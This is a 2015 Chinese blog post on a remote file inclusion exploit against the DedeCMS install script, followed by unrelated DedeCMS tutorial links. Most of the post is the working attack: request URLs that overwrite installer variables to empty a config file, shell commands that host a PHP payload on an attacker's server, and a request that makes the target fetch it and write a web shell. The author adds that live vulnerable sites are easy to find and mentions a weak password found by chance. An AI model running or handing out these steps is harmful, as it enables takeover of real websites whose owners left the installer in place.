Web渗透学习-织梦CMS-RFI

原创 2015年07月09日 15:18:19

今天学习了exploit-db上面的一个漏洞,是织梦CMS最新版本的RFI(远程文件包含)。

织梦CMS最新版本的安装文件中仍然采用覆盖变量的方式更新系统,并且存在一些关键变量存储更新系统的路径信息,因此可以通过覆盖变量的方式来获取shell。

大致可以分为三步:


1.清空/data/config_update.php中的信息。

http://127.0.0.1/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=../data/admin/config_update.php

2.自己开一台服务器,假设是192.168.3.162,在服务器中写一个简单的脚本(但是不能保存成php类型)。

$ifconfig en0
$mkdir "dedecms"
$cd dedecms
$echo "<?php phpinfo();?>" > demodata.a.txt
$python -m SimpleHTTPServer


3.获取shell。

http://127.0.0.1/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=hello.php
&updateHost=http://192.168.3.162:8000/


接下来可以验证一下,访问hello.php就好。

http://127.0.0.1/install/hello.php




漏洞原理不难,但是想发现还是不容易的。而且这个漏洞仅限于一般用户(因为install属于安装后可以删除的文件夹),但是在实际找的时候还是发现很多网站没有删除。

还没有找真正的网站去试,不过却偶然发现了一个弱口令,希望能获得一枚乌云账号吧~

---------------------------

更新:这个漏洞还是很好找网站的~随便那么一找就找到啦

版权声明:本文为博主原创文章,未经博主允许不得转载。

DedeCMS自学教程5、织梦CMS顶部添加横向登录框

DedeCMS自学教程5、织梦CMS顶部添加横向登录框 DedeCMS自学教程5、顶部添加横向导航。本节以DedeCMS默认风格为例,所以,如果你站点使用的不是默认模板,要灵活修改。 ...
  • sgjjuaw
  • sgjjuaw
  • 2015年01月07日 10:44
  • 387

DedeCMS自学教程13:织梦CMS站点文档存放路径url优化设置

DedeCMS调用指定栏目不包含下级栏目的问题 DedeCMS自学教程13:织梦CMS站点文档存放路径url优化设置 DedeCMS自学教程13:织梦CMS站点文档存放路径url优化设置 ...
  • jxmjrdv
  • jxmjrdv
  • 2014年10月26日 11:22
  • 518

织梦CMS v5.7 完美实现导航条下拉二级菜单

转载请标明是引用于 http://blog.csdn.net/chenyujing5678  欢迎拍砖!   一、引言 好多人都问,织梦的下拉导航怎么做呢?其实很简单!即使你对代码一点也不...

织梦CMS5.7版自动给图片添加alt属性的方法

搜素引擎看不懂图片,通过给图片添加alt属性,有助于搜索引擎判了解这是一张什么图片,利于搜索引擎优化,在SEO优化中,图片ALT属性描述很重要,图片alt属性就是对图片进行描述的文字。描述中可以加入网...

解决织梦CMS后台验证码不正确的四种方法

解决织梦CMS后台验证码不正确的四种方法 快速解决验证码不正确问题的思路,可以分类两类:1:取消掉验证码,直接登录。2:修复验证码,回复验证码功能。dedemcs模版 4种处理办法: ...
  • nxnilaw
  • nxnilaw
  • 2014年10月13日 10:06
  • 190

安装dede cms 遇到的问题及解决办法,(织梦官方你是放弃这个产品了吗?)

DEDE CMS版本: dede_V5_6_UTF8 安装过程中出现: 8a4773468b800900dcfefbc5988833ed.xml 不存在或不可读! 原因:缺少模块文件...

织梦cms在本地测试完后织如何迁移

一 织梦cms如何建站 织梦cms如何建站是一个很简单的问题。你需要买一个支持Php及mysql的空间,然后需要买一个域名,然后去织梦官方网站将织梦cms程序下载下来,这个程序是一个以tar.g...

织梦CMS&nbsp;DEDE模板调用标签大全

DEDE标签调用大全   ———————————————————————————————————————————————————————————————————————————————— 关键描述调...
  • yw0421
  • yw0421
  • 2013年10月30日 14:04
  • 569

织梦cms网站安全防护设置

总所周知织梦系统是目前开源CMS系统中,使用人数最多的系统之一,所以也被黑客们盯上了,官方对于系统的更新速度也比较慢,所以大家只能自己做好防范工作,这样才能更好的确保网站的安全性。 一:尽量不要...
  • hlplan
  • hlplan
  • 2017年10月18日 17:45
  • 77

织梦CMS 万能API微信小程序接口插件 新增upload类

织梦CMS万能API接口插件是一个主要用于构造各种API接口的插件,同时它也是开发织梦CMS各类插件的利器。 插件基于织梦5.7SP2-utf8开发,新增了图片上传接口,便于微信小程序端上传图片。...
  • klshige
  • klshige
  • 2017年11月25日 09:17
  • 580
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Web渗透学习-织梦CMS-RFI
举报原因:
原因补充:

(最多只允许输入30个字)